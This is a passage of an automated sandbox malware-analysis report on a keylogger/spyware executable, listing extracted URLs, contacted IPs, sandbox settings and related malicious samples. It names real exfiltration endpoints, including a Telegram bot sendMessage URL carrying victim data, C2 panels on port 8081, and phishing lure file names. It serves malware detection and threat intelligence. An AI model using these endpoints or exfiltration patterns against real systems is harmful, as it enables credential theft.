                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=en173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002711000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=en8173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000270C000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000026E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://the.drillmmcsnk.top173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://varders.kozow.com:8081173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20a173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.office.com/8173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002733000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?L173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000276D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anotherarmy.dns.army:8081173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.75$173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002640000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://checkip.dyndns.org/q173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002640000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://the.drillmmcsnk.top/den/api.php173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.org/xml/173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            132.226.8.169
                                                                                            		checkip.dyndns.comUnited States
                                                                                            		16989UTMEMUSfalse
                                                                                            149.154.167.220
                                                                                            		api.telegram.orgUnited Kingdom
                                                                                            		62041TELEGRAMRUfalse
                                                                                            104.21.67.152
                                                                                            		reallyfreegeoip.orgUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            5.182.211.149
                                                                                            		the.drillmmcsnk.topNetherlands
                                                                                            		64425SKB-ENTERPRISENLfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1562938
                                                                                            Start date and time:2024-11-26 09:45:58 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 8m 14s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.winEXE@1/0@4/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 172
                                                                                            • Number of non-executed functions: 126
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            • VT rate limit hit for: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            03:46:56API Interceptor10584770x Sleep call for process: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            132.226.8.169PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            149.154.167.220Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                            INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                104.21.67.152RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    reallyfreegeoip.orgVSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    api.telegram.orgDysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    the.drillmmcsnk.topMC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    checkip.dyndns.com173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    TELEGRAMRUDysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    CLOUDFLARENETUSgeHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.187.200
                                                                                                                                    VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                    • 172.67.213.249
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.133.70
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 172.67.202.26
                                                                                                                                    UTMEMUSVSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.8.169
